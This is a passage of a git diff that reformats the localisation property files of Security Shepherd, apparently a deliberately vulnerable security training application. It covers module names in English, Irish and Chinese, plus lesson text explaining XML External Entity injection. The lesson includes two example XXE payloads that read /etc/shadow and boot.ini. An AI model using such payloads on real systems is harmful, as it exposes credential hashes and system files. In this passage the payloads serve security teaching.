+button.showIntro = \u663E\u793A\u8BFE\u7A0B\u4ECB\u7ECD
+button.getUser = \u83B7\u53D6\u8FD9\u4E2A\u7528\u6237
+error.occurred = \u4EA7\u751F\u4E00\u4E2A\u9519\u8BEF
diff --git a/src/main/resources/i18n/lessons/xxe/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.properties b/src/main/resources/i18n/lessons/xxe/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.properties
index a4aaedc07..2fe9e9f6b 100644
--- a/src/main/resources/i18n/lessons/xxe/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.properties
+++ b/src/main/resources/i18n/lessons/xxe/57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a.properties
@@ -1,15 +1,15 @@
-title.question.xxe=What is XML External Entity (XXE) Injection?
-paragraph.info.1=An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
-paragraph.info.2=The XML 1.0 standard defines a concept called an entity, which is a storage unit of some type. External entity can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI which can be accessed by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor accesses this tainted data and the XML processor may disclose confidential information normally not accessible by the application.
-paragraph.info.3=Attacks can include;
View the contents of local files
Pivot to other internal systems disclosing content via http(s) requests or launching an CSRF attack
arbitrary code execution if the XML processor is vulnerable to client-side memory corruption
DoS where local resources may not stop returning data
-example.text=Example
-example.xxe.1=<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
-example.xxe.2=<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
-paragraph.whattodo.xxe=To complete this lesson you must read the contents of the file
-paragraph.info.emailAddr=Please enter your email to reset the password
-word.info.loading=Loading...
-sentence.question.wouldYouLikeHint=Would you like a hint?
-button.hideIntro=Hide Lesson Introduction
-button.showIntro=Show Lesson Introduction
-button.resetPassword=Reset My Password
-error.occurred=An Error Occurred
\ No newline at end of file
+title.question.xxe = What is XML External Entity (XXE) Injection?
+paragraph.info.1 = An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.
+paragraph.info.2 = The XML 1.0 standard defines a concept called an entity, which is a storage unit of some type. External entity can access local or remote content via a declared system identifier. The system identifier is assumed to be a URI which can be accessed by the XML processor when processing the entity. The XML processor then replaces occurrences of the named external entity with the contents dereferenced by the system identifier. If the system identifier contains tainted data and the XML processor accesses this tainted data and the XML processor may disclose confidential information normally not accessible by the application.
+paragraph.info.3 = Attacks can include;
View the contents of local files
Pivot to other internal systems disclosing content via http(s) requests or launching an CSRF attack
arbitrary code execution if the XML processor is vulnerable to client-side memory corruption
DoS where local resources may not stop returning data
+example.text = Example
+example.xxe.1 = <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
+example.xxe.2 = <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
+paragraph.whattodo.xxe = To complete this lesson you must read the contents of the file
+paragraph.info.emailAddr = Please enter your email to reset the password
+word.info.loading = Loading...
+sentence.question.wouldYouLikeHint = Would you like a hint?
+button.hideIntro = Hide Lesson Introduction
+button.showIntro = Show Lesson Introduction
+button.resetPassword = Reset My Password
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/moduleGenerics/mobileGenericStrings.properties b/src/main/resources/i18n/moduleGenerics/mobileGenericStrings.properties
index 651dcc1ae..5e43ec8bb 100644
--- a/src/main/resources/i18n/moduleGenerics/mobileGenericStrings.properties
+++ b/src/main/resources/i18n/moduleGenerics/mobileGenericStrings.properties
@@ -1,2 +1,2 @@
-mobileBlurb.vmLink.1=To complete this challenge you'll need to use the
-mobileBlurb.vmLink.2=app found in the Security Shepherd Android Virtual Machine.
+mobileBlurb.vmLink.1 = To complete this challenge you'll need to use the
+mobileBlurb.vmLink.2 = app found in the Security Shepherd Android Virtual Machine.
diff --git a/src/main/resources/i18n/moduleGenerics/moduleNames.properties b/src/main/resources/i18n/moduleGenerics/moduleNames.properties
index e342e9893..8bd1c433e 100644
--- a/src/main/resources/i18n/moduleGenerics/moduleNames.properties
+++ b/src/main/resources/i18n/moduleGenerics/moduleNames.properties
@@ -1,100 +1,101 @@
-broken.crypto=Broken Crypto
-broken.crypto.1=Broken Crypto 1
-broken.crypto.2=Broken Crypto 2
-broken.crypto.3=Broken Crypto 3
-broken.session.management=Broken Session Management
-client.side.injection=Client Side Injection
-client.side.injection.1=Client Side Injection 1
-client.side.injection.2=Client Side Injection 2
-content.provider.leakage=Content Provider Leakage
-content.provider.leakage.1=Content Provider Leakage 1
-cross.site.request.forgery=Cross Site Request Forgery
-cross.site.scripting=Cross Site Scripting
-cross.site.scripting.1=Cross Site Scripting 1
-cross.site.scripting.2=Cross Site Scripting 2
-cross.site.scripting.3=Cross Site Scripting 3
-cross.site.scripting.4=Cross Site Scripting 4
-cross.site.scripting.5=Cross Site Scripting 5
-cross.site.scripting.6=Cross Site Scripting 6
-csrf.1=CSRF 1
-csrf.2=CSRF 2
-csrf.3=CSRF 3
-csrf.4=CSRF 4
-csrf.5=CSRF 5
-csrf.6=CSRF 6
-csrf.7=CSRF 7
-csrf.json=CSRF JSON
-failure.to.restrict.url.access=Failure to Restrict URL Access
-failure.to.restrict.url.access.1=Failure to Restrict URL Access 1
-failure.to.restrict.url.access.2=Failure to Restrict URL Access 2
-failure.to.restrict.url.access.3=Failure to Restrict URL Access 3
-insecure.cryptographic.storage=Insecure Cryptographic Storage
-insecure.cryptographic.storage.challenge.1=Insecure Cryptographic Storage Challenge 1
-insecure.cryptographic.storage.challenge.2=Insecure Cryptographic Storage Challenge 2
-insecure.cryptographic.storage.challenge.3=Insecure Cryptographic Storage Challenge 3
-insecure.cryptographic.storage.challenge.4=Insecure Cryptographic Storage Challenge 4
-insecure.cryptographic.storage.home.made.key=Insecure Cryptographic Storage Home Made Keys
-insecure.data.storage=Insecure Data Storage
-insecure.data.storage.1=Insecure Data Storage 1
-insecure.data.storage.2=Insecure Data Storage 2
-insecure.data.storage.3=Insecure Data Storage 3
-insecure.direct.object.reference.bank=Insecure Direct Object Reference Bank
-insecure.direct.object.reference.challenge.1=Insecure Direct Object Reference Challenge 1
-insecure.direct.object.reference.challenge.2=Insecure Direct Object Reference Challenge 2
-insecure.direct.object.references=Insecure Direct Object References
-nosql.injection.one=NoSQL Injection One
-poor.authentication=Poor Authentication
-poor.authentication.1=Poor Authentication 1
-poor.authentication.2=Poor Authentication 2
-poor.data.validation=Poor Data Validation
-poor.data.validation.1=Poor Data Validation 1
-poor.data.validation.2=Poor Data Validation 2
-reverse.engineering=Reverse Engineering
-reverse.engineering.1=Reverse Engineering 1
-reverse.engineering.2=Reverse Engineering 2
-reverse.engineering.3=Reverse Engineering 3
-security.misconfig.cookie.flag=Security Misconfig Cookie Flag
-security.misconfiguration=Security Misconfiguration
-session.management.challenge.1=Session Management Challenge 1
-session.management.challenge.2=Session Management Challenge 2
-session.management.challenge.3=Session Management Challenge 3
-session.management.challenge.4=Session Management Challenge 4
-session.management.challenge.5=Session Management Challenge 5
-session.management.challenge.6=Session Management Challenge 6
-session.management.challenge.7=Session Management Challenge 7
-session.management.challenge.8=Session Management Challenge 8
-sql.injection=SQL Injection
-sql.injection.1=SQL Injection 1
-sql.injection.2=SQL Injection 2
-sql.injection.3=SQL Injection 3
-sql.injection.4=SQL Injection 4
-sql.injection.5=SQL Injection 5
-sql.injection.6=SQL Injection 6
-sql.injection.7=SQL Injection 7
-sql.injection.escaping=SQL Injection Escaping
-sql.injection.stored.procedure=SQL Injection Stored Procedure
-unintended.data.leakage=Unintended Data Leakage
-unintended.data.leakage.1=Unintended Data Leakage 1
-unintended.data.leakage.2=Unintended Data Leakage 2
-untrusted.input=Untrusted Input
-unvalidated.redirects.and.forwards=Unvalidated Redirects and Forwards
-xxe.lessons=XML External Entity (XXE) Injection
-xxe.injection.1=XXE Injection 1
-category.csrf=CSRF
-category.failure.to.restrict.url.access=Failure to Restrict URL Access
-category.injection=Injection
-category.insecure.cryptographic.storage=Insecure Cryptographic Storage
-category.insecure.direct.object.references=Insecure Direct Object References
-category.mobile.broken.crypto=Mobile Broken Crypto
-category.mobile.content.provider=Mobile Content Providers
-category.mobile.data.leakage=Mobile Data Leakage
-category.mobile.injection=Mobile Injection
-category.mobile.insecure.data.storage=Mobile Insecure Data Storage
-category.mobile.poor.authentication=Mobile Poor Authentication
-category.mobile.reverse.engineering=Mobile Reverse Engineering
-category.mobile.security.decisions.via.untrusted.input=Mobile Security Decisions via Untrusted Input
-category.poor.data.validation=Poor Data Validation
-category.security.misconfigurations=Security Misconfigurations
-category.session.management=Session Management
-category.unvalidated.redirects.and.forwards=Unvalidated Redirects and Forwards
-category.xss=XSS
+broken.crypto = Broken Crypto
+broken.crypto.1 = Broken Crypto 1
+broken.crypto.2 = Broken Crypto 2
+broken.crypto.3 = Broken Crypto 3
+broken.session.management = Broken Session Management
+client.side.injection = Client Side Injection
+client.side.injection.1 = Client Side Injection 1
+client.side.injection.2 = Client Side Injection 2
+content.provider.leakage = Content Provider Leakage
+content.provider.leakage.1 = Content Provider Leakage 1
+cross.site.request.forgery = Cross Site Request Forgery
+cross.site.scripting = Cross Site Scripting
+cross.site.scripting.1 = Cross Site Scripting 1
+cross.site.scripting.2 = Cross Site Scripting 2
+cross.site.scripting.3 = Cross Site Scripting 3
+cross.site.scripting.4 = Cross Site Scripting 4
+cross.site.scripting.5 = Cross Site Scripting 5
+cross.site.scripting.6 = Cross Site Scripting 6
+csrf.1 = CSRF 1
+csrf.2 = CSRF 2
+csrf.3 = CSRF 3
+csrf.4 = CSRF 4
+csrf.5 = CSRF 5
+csrf.6 = CSRF 6
+csrf.7 = CSRF 7
+csrf.json = CSRF JSON
+failure.to.restrict.url.access = Failure to Restrict URL Access
+failure.to.restrict.url.access.1 = Failure to Restrict URL Access 1
+failure.to.restrict.url.access.2 = Failure to Restrict URL Access 2
+failure.to.restrict.url.access.3 = Failure to Restrict URL Access 3
+insecure.cryptographic.storage = Insecure Cryptographic Storage
+insecure.cryptographic.storage.challenge.1 = Insecure Cryptographic Storage Challenge 1
+insecure.cryptographic.storage.challenge.2 = Insecure Cryptographic Storage Challenge 2
+insecure.cryptographic.storage.challenge.3 = Insecure Cryptographic Storage Challenge 3
+insecure.cryptographic.storage.challenge.4 = Insecure Cryptographic Storage Challenge 4
+insecure.cryptographic.storage.home.made.key = Insecure Cryptographic Storage Home Made Keys
+insecure.data.storage = Insecure Data Storage
+insecure.data.storage.1 = Insecure Data Storage 1
+insecure.data.storage.2 = Insecure Data Storage 2
+insecure.data.storage.3 = Insecure Data Storage 3
+insecure.direct.object.reference.bank = Insecure Direct Object Reference Bank
+insecure.direct.object.reference.challenge.1 = Insecure Direct Object Reference Challenge 1
+insecure.direct.object.reference.challenge.2 = Insecure Direct Object Reference Challenge 2
+insecure.direct.object.references = Insecure Direct Object References
+nosql.injection.one = NoSQL Injection One
+poor.authentication = Poor Authentication
+poor.authentication.1 = Poor Authentication 1
+poor.authentication.2 = Poor Authentication 2
+poor.data.validation = Poor Data Validation
+poor.data.validation.1 = Poor Data Validation 1
+poor.data.validation.2 = Poor Data Validation 2
+reverse.engineering = Reverse Engineering
+reverse.engineering.1 = Reverse Engineering 1
+reverse.engineering.2 = Reverse Engineering 2
+reverse.engineering.3 = Reverse Engineering 3
+security.misconfig.cookie.flag = Security Misconfig Cookie Flag
+security.misconfiguration = Security Misconfiguration
+session.management.challenge.1 = Session Management Challenge 1
+session.management.challenge.2 = Session Management Challenge 2
+session.management.challenge.3 = Session Management Challenge 3
+session.management.challenge.4 = Session Management Challenge 4
+session.management.challenge.5 = Session Management Challenge 5
+session.management.challenge.6 = Session Management Challenge 6
+session.management.challenge.7 = Session Management Challenge 7
+session.management.challenge.8 = Session Management Challenge 8
+sql.injection = SQL Injection
+sql.injection.1 = SQL Injection 1
+sql.injection.2 = SQL Injection 2
+sql.injection.3 = SQL Injection 3
+sql.injection.4 = SQL Injection 4
+sql.injection.5 = SQL Injection 5
+sql.injection.6 = SQL Injection 6
+sql.injection.7 = SQL Injection 7
+sql.injection.escaping = SQL Injection Escaping
+sql.injection.stored.procedure = SQL Injection Stored Procedure
+unintended.data.leakage = Unintended Data Leakage
+unintended.data.leakage.1 = Unintended Data Leakage 1
+unintended.data.leakage.2 = Unintended Data Leakage 2
+untrusted.input = Untrusted Input
+unvalidated.redirects.and.forwards = Unvalidated Redirects and Forwards
+xxe.lessons = XML External Entity (XXE) Injection
+xxe.injection.1 = XXE Injection 1
+
+category.csrf = CSRF
+category.failure.to.restrict.url.access = Failure to Restrict URL Access
+category.injection = Injection
+category.insecure.cryptographic.storage = Insecure Cryptographic Storage
+category.insecure.direct.object.references = Insecure Direct Object References
+category.mobile.broken.crypto = Mobile Broken Crypto
+category.mobile.content.provider = Mobile Content Providers
+category.mobile.data.leakage = Mobile Data Leakage
+category.mobile.injection = Mobile Injection
+category.mobile.insecure.data.storage = Mobile Insecure Data Storage
+category.mobile.poor.authentication = Mobile Poor Authentication
+category.mobile.reverse.engineering = Mobile Reverse Engineering
+category.mobile.security.decisions.via.untrusted.input = Mobile Security Decisions via Untrusted Input
+category.poor.data.validation = Poor Data Validation
+category.security.misconfigurations = Security Misconfigurations
+category.session.management = Session Management
+category.unvalidated.redirects.and.forwards = Unvalidated Redirects and Forwards
+category.xss = XSS
diff --git a/src/main/resources/i18n/moduleGenerics/moduleNames_ga.properties b/src/main/resources/i18n/moduleGenerics/moduleNames_ga.properties
index bab06c183..38050d2ac 100644
--- a/src/main/resources/i18n/moduleGenerics/moduleNames_ga.properties
+++ b/src/main/resources/i18n/moduleGenerics/moduleNames_ga.properties
@@ -1,93 +1,94 @@
-broken.crypto=Briste Cripteagrafaíocht
-broken.crypto.1=Briste Cripteagrafaíocht 1
-broken.crypto.2=Briste Cripteagrafaíocht 2
-broken.crypto.3=Briste Cripteagrafaíocht 3
-broken.session.management=Briste Bainisteoireacht an tSeisiúin
-client.side.injection=Instealladh Taobh Cliaint
-client.side.injection.1=Instealladh Taobh Cliaint 1
-client.side.injection.2=Instealladh Taobh Cliaint 2
-content.provider.leakage=Soláthraí Sceitheadh Ábhair
-cross.site.request.forgery=Trasna Suíomh Iarratas a Bhrionnú
-cross.site.scripting=Trasna Suíomh Scriptithe
-cross.site.scripting.1=Trasna Suíomh Scriptithe 1
-cross.site.scripting.2=Trasna Suíomh Scriptithe 2
-cross.site.scripting.3=Trasna Suíomh Scriptithe 3
-cross.site.scripting.4=Trasna Suíomh Scriptithe 4
-cross.site.scripting.5=Trasna Suíomh Scriptithe 5
-cross.site.scripting.6=Trasna Suíomh Scriptithe 6
-csrf.1=CSRF 1
-csrf.2=CSRF 2
-csrf.3=CSRF 3
-csrf.4=CSRF 4
-csrf.5=CSRF 5
-csrf.6=CSRF 6
-csrf.7=CSRF 7
-csrf.json=CSRF JSON
-failure.to.restrict.url.access=Neamhghnímh a Srian Rochtain a URL
-failure.to.restrict.url.access.1=Neamhghnímh a Srian Rochtain a URL 1
-failure.to.restrict.url.access.2=Neamhghnímh a Srian Rochtain a URL 2
-failure.to.restrict.url.access.3=Neamhghnímh a Srian Rochtain a URL 3
-insecure.cryptographic.storage=Éadaingean Cripteagrafaíocht Stóráil
-insecure.cryptographic.storage.challenge.1=Éadaingean Cripteagrafaíocht Stóráil 1
-insecure.cryptographic.storage.challenge.2=Éadaingean Cripteagrafaíocht Stóráil 2
-insecure.cryptographic.storage.challenge.3=Éadaingean Cripteagrafaíocht Stóráil 3
-insecure.cryptographic.storage.challenge.4=Éadaingean Cripteagrafaíocht Stóráil 4
-insecure.data.storage=Éadaingean Sonraí Stóráil
-insecure.data.storage.1=Éadaingean Sonraí Stóráil 1
-insecure.data.storage.2=Éadaingean Sonraí Stóráil 2
-insecure.data.storage.3=Éadaingean Sonraí Stóráil 3
-insecure.direct.object.reference.bank=Éadaingean Dír-Oibiacht Tagairt Banc
-insecure.direct.object.reference.challenge.1=Éadaingean Dír-Oibiacht Tagairt 1
-insecure.direct.object.reference.challenge.2=Éadaingean Dír-Oibiacht Tagairt 2
-insecure.direct.object.references=Éadaingean Dír-Oibiacht Tagairt
-nosql.injection.one=NoSQL Instealladh 1
-poor.authentication=Droch Fhíordheimhniú
-poor.authentication.1=Droch Fhíordheimhniú 1
-poor.data.validation=Droch Bailíochtú Sonraí
-poor.data.validation.1=Droch Bailíochtú Sonraí 1
-poor.data.validation.2=Droch Bailíochtú Sonraí 2
-reverse.engineering=Droim ar ais Innealtóireacht
-reverse.engineering.1=Innealtóireacht Droim ar ais 1
-reverse.engineering.2=Innealtóireacht Droim ar ais 2
-reverse.engineering.3=Innealtóireacht Droim ar ais 3
-security.misconfig.cookie.flag=Nach bhfuil slándáil chórais cumraithe mar is ceart Fianán Bratach
-security.misconfiguration=Nach bhfuil slándáil chórais cumraithe mar is ceart
-session.management.challenge.1=Bainisteoireacht an tSeisiúin 1
-session.management.challenge.2=Bainisteoireacht an tSeisiúin 2
-session.management.challenge.3=Bainisteoireacht an tSeisiúin 3
-session.management.challenge.4=Bainisteoireacht an tSeisiúin 4
-session.management.challenge.5=Bainisteoireacht an tSeisiúin 5
-session.management.challenge.6=Bainisteoireacht an tSeisiúin 6
-session.management.challenge.7=Bainisteoireacht an tSeisiúin 7
-session.management.challenge.8=Bainisteoireacht an tSeisiúin 8
-sql.injection=SQL Instealladh
-sql.injection.1=SQL Instealladh 1
-sql.injection.2=SQL Instealladh 2
-sql.injection.3=SQL Instealladh 3
-sql.injection.4=SQL Instealladh 4
-sql.injection.5=SQL Instealladh 5
-sql.injection.6=SQL Instealladh 6
-sql.injection.7=SQL Instealladh 7
-sql.injection.escaping=SQL Instealladh éalúcháin
-sql.injection.stored.procedure=SQL Instealladh stóráilte gníomh
-unintended.data.leakage=Neamhbheartaithe Sonraí Sceitheadh
-unintended.data.leakage.1=Neamhbheartaithe Sonraí Sceitheadh 1
-unintended.data.leakage.2=Neamhbheartaithe Sonraí Sceitheadh 2
-unvalidated.redirects.and.forwards=Atreorú agus ar aghaidh nach bailíochtaithe
-category.csrf=CSRF
-category.failure.to.restrict.url.access=Neamhghnímh a Srian Rochtain a URL
-category.injection=Instealladh
-category.insecure.cryptographic.storage=Éadaingean Cripteagrafaíocht Stóráil
-category.insecure.direct.object.references=Éadaingean Dír-Oibiacht Tagairt
-category.mobile.broken.crypto=Móibíleacha Briste Cripteagrafaíocht
-category.mobile.content.providers=Móibíleacha Soláthraithe Ábhar
-category.mobile.data.leakage=Móibíleacha Sonraí Sceitheadh
-category.mobile.injection=Móibíleacha Instealladh
-category.mobile.insecure.data.storage=Móibíleacha Éadaingean Sonraí Stóráil
-category.mobile.poor.authentication=Móibíleacha Droch Fhíordheimhniú
-category.mobile.reverse.engineering=Móibíleacha Innealtóireacht Droim ar ais
-category.poor.data.validation=Droch Bailíochtú Sonraí
-category.security.misconfigurations=Nach bhfuil slándáil chórais cumraithe mar is ceart
-category.session.management=Bainisteoireacht an tSeisiúin
-category.unvalidated.redirects.and.forwards=Atreorú agus ar aghaidh nach bailíochtaithe
-category.xss=XSS
+broken.crypto = Briste Cripteagrafaíocht
+broken.crypto.1 = Briste Cripteagrafaíocht 1
+broken.crypto.2 = Briste Cripteagrafaíocht 2
+broken.crypto.3 = Briste Cripteagrafaíocht 3
+broken.session.management = Briste Bainisteoireacht an tSeisiúin
+client.side.injection = Instealladh Taobh Cliaint
+client.side.injection.1 = Instealladh Taobh Cliaint 1
+client.side.injection.2 = Instealladh Taobh Cliaint 2
+content.provider.leakage = Soláthraí Sceitheadh Ábhair
+cross.site.request.forgery = Trasna Suíomh Iarratas a Bhrionnú
+cross.site.scripting = Trasna Suíomh Scriptithe
+cross.site.scripting.1 = Trasna Suíomh Scriptithe 1
+cross.site.scripting.2 = Trasna Suíomh Scriptithe 2
+cross.site.scripting.3 = Trasna Suíomh Scriptithe 3
+cross.site.scripting.4 = Trasna Suíomh Scriptithe 4
+cross.site.scripting.5 = Trasna Suíomh Scriptithe 5
+cross.site.scripting.6 = Trasna Suíomh Scriptithe 6
+csrf.1 = CSRF 1
+csrf.2 = CSRF 2
+csrf.3 = CSRF 3
+csrf.4 = CSRF 4
+csrf.5 = CSRF 5
+csrf.6 = CSRF 6
+csrf.7 = CSRF 7
+csrf.json = CSRF JSON
+failure.to.restrict.url.access = Neamhghnímh a Srian Rochtain a URL
+failure.to.restrict.url.access.1 = Neamhghnímh a Srian Rochtain a URL 1
+failure.to.restrict.url.access.2 = Neamhghnímh a Srian Rochtain a URL 2
+failure.to.restrict.url.access.3 = Neamhghnímh a Srian Rochtain a URL 3
+insecure.cryptographic.storage = Éadaingean Cripteagrafaíocht Stóráil
+insecure.cryptographic.storage.challenge.1 = Éadaingean Cripteagrafaíocht Stóráil 1
+insecure.cryptographic.storage.challenge.2 = Éadaingean Cripteagrafaíocht Stóráil 2
+insecure.cryptographic.storage.challenge.3 = Éadaingean Cripteagrafaíocht Stóráil 3
+insecure.cryptographic.storage.challenge.4 = Éadaingean Cripteagrafaíocht Stóráil 4
+insecure.data.storage = Éadaingean Sonraí Stóráil
+insecure.data.storage.1 = Éadaingean Sonraí Stóráil 1
+insecure.data.storage.2 = Éadaingean Sonraí Stóráil 2
+insecure.data.storage.3 = Éadaingean Sonraí Stóráil 3
+insecure.direct.object.reference.bank = Éadaingean Dír-Oibiacht Tagairt Banc
+insecure.direct.object.reference.challenge.1 = Éadaingean Dír-Oibiacht Tagairt 1
+insecure.direct.object.reference.challenge.2 = Éadaingean Dír-Oibiacht Tagairt 2
+insecure.direct.object.references = Éadaingean Dír-Oibiacht Tagairt
+nosql.injection.one = NoSQL Instealladh 1
+poor.authentication = Droch Fhíordheimhniú
+poor.authentication.1 = Droch Fhíordheimhniú 1
+poor.data.validation = Droch Bailíochtú Sonraí
+poor.data.validation.1 = Droch Bailíochtú Sonraí 1
+poor.data.validation.2 = Droch Bailíochtú Sonraí 2
+reverse.engineering = Droim ar ais Innealtóireacht
+reverse.engineering.1 = Innealtóireacht Droim ar ais 1
+reverse.engineering.2 = Innealtóireacht Droim ar ais 2
+reverse.engineering.3 = Innealtóireacht Droim ar ais 3
+security.misconfig.cookie.flag = Nach bhfuil slándáil chórais cumraithe mar is ceart Fianán Bratach
+security.misconfiguration = Nach bhfuil slándáil chórais cumraithe mar is ceart
+session.management.challenge.1 = Bainisteoireacht an tSeisiúin 1
+session.management.challenge.2 = Bainisteoireacht an tSeisiúin 2
+session.management.challenge.3 = Bainisteoireacht an tSeisiúin 3
+session.management.challenge.4 = Bainisteoireacht an tSeisiúin 4
+session.management.challenge.5 = Bainisteoireacht an tSeisiúin 5
+session.management.challenge.6 = Bainisteoireacht an tSeisiúin 6
+session.management.challenge.7 = Bainisteoireacht an tSeisiúin 7
+session.management.challenge.8 = Bainisteoireacht an tSeisiúin 8
+sql.injection = SQL Instealladh
+sql.injection.1 = SQL Instealladh 1
+sql.injection.2 = SQL Instealladh 2
+sql.injection.3 = SQL Instealladh 3
+sql.injection.4 = SQL Instealladh 4
+sql.injection.5 = SQL Instealladh 5
+sql.injection.6 = SQL Instealladh 6
+sql.injection.7 = SQL Instealladh 7
+sql.injection.escaping = SQL Instealladh éalúcháin
+sql.injection.stored.procedure = SQL Instealladh stóráilte gníomh
+unintended.data.leakage = Neamhbheartaithe Sonraí Sceitheadh
+unintended.data.leakage.1 = Neamhbheartaithe Sonraí Sceitheadh 1
+unintended.data.leakage.2 = Neamhbheartaithe Sonraí Sceitheadh 2
+unvalidated.redirects.and.forwards = Atreorú agus ar aghaidh nach bailíochtaithe
+
+category.csrf = CSRF
+category.failure.to.restrict.url.access = Neamhghnímh a Srian Rochtain a URL
+category.injection = Instealladh
+category.insecure.cryptographic.storage = Éadaingean Cripteagrafaíocht Stóráil
+category.insecure.direct.object.references = Éadaingean Dír-Oibiacht Tagairt
+category.mobile.broken.crypto = Móibíleacha Briste Cripteagrafaíocht
+category.mobile.content.providers = Móibíleacha Soláthraithe Ábhar
+category.mobile.data.leakage = Móibíleacha Sonraí Sceitheadh
+category.mobile.injection = Móibíleacha Instealladh
+category.mobile.insecure.data.storage = Móibíleacha Éadaingean Sonraí Stóráil
+category.mobile.poor.authentication = Móibíleacha Droch Fhíordheimhniú
+category.mobile.reverse.engineering = Móibíleacha Innealtóireacht Droim ar ais
+category.poor.data.validation = Droch Bailíochtú Sonraí
+category.security.misconfigurations = Nach bhfuil slándáil chórais cumraithe mar is ceart
+category.session.management = Bainisteoireacht an tSeisiúin
+category.unvalidated.redirects.and.forwards = Atreorú agus ar aghaidh nach bailíochtaithe
+category.xss = XSS
diff --git a/src/main/resources/i18n/moduleGenerics/moduleNames_zh.properties b/src/main/resources/i18n/moduleGenerics/moduleNames_zh.properties
index 5a822ad0f..ff909b938 100644
--- a/src/main/resources/i18n/moduleGenerics/moduleNames_zh.properties
+++ b/src/main/resources/i18n/moduleGenerics/moduleNames_zh.properties
@@ -1,94 +1,95 @@
-broken.crypto=\u5931\u6548\u52A0\u5BC6
-broken.crypto.1=\u5931\u6548\u52A0\u5BC6 1
-broken.crypto.2=\u5931\u6548\u52A0\u5BC6 2
-broken.crypto.3=\u5931\u6548\u52A0\u5BC6 3
-broken.session.management=\u5931\u6548\u7684\u4F1A\u8BDD\u7BA1\u7406
-client.side.injection=\u5BA2\u6237\u7AEF\u6CE8\u5165
-client.side.injection.1=\u5BA2\u6237\u7AEF\u6CE8\u5165 1
-client.side.injection.2=\u5BA2\u6237\u7AEF\u6CE8\u5165 2
-content.provider.leakage=\u5185\u5BB9\u63D0\u4F9B\u8005\u6CC4\u6F0F
-cross.site.request.forgery=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF)
-cross.site.scripting=\u8DE8\u7AD9\u811A\u672C (XSS)
-cross.site.scripting.1=\u8DE8\u7AD9\u811A\u672C (XSS) 1
-cross.site.scripting.2=\u8DE8\u7AD9\u811A\u672C (XSS)2
-cross.site.scripting.3=\u8DE8\u7AD9\u811A\u672C (XSS)3
-cross.site.scripting.4=\u8DE8\u7AD9\u811A\u672C (XSS)4
-cross.site.scripting.5=\u8DE8\u7AD9\u811A\u672C (XSS)5
-cross.site.scripting.6=\u8DE8\u7AD9\u811A\u672C (XSS)6
-csrf.1=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 1
-csrf.2=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 2
-csrf.3=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 3
-csrf.4=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 4
-csrf.5=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 5
-csrf.6=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 6
-csrf.7=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 (CSRF) 7
-csrf.json=\u8DE8\u7AD9\u8BF7\u6C42\u4F2A\u9020 JSON (CSRF JSON)
-failure.to.restrict.url.access=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE
-failure.to.restrict.url.access.1=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 1
-failure.to.restrict.url.access.2=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 2
-failure.to.restrict.url.access.3=\u6CA1\u6709\u9650\u5236URL\u8BBF\u95EE 3
-insecure.cryptographic.storage=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8
-insecure.cryptographic.storage.challenge.1=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 1
-insecure.cryptographic.storage.challenge.2=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 2
-insecure.cryptographic.storage.challenge.3=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 3
-insecure.cryptographic.storage.challenge.4=\u4E0D\u5B89\u5168\u7684\u52A0\u5BC6\u5B58\u50A8 4
-insecure.data.storage=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8
-insecure.data.storage.1=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 1
-insecure.data.storage.2=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 2
-insecure.data.storage.3=\u4E0D\u5B89\u5168\u7684\u6570\u636E\u5B58\u50A8 3
-insecure.direct.object.reference.bank=\u94F6\u884C\u4E0D\u5B89\u5168\u7684\u76F4\u63A5\u5BF9\u8C61\u5F15\u7528
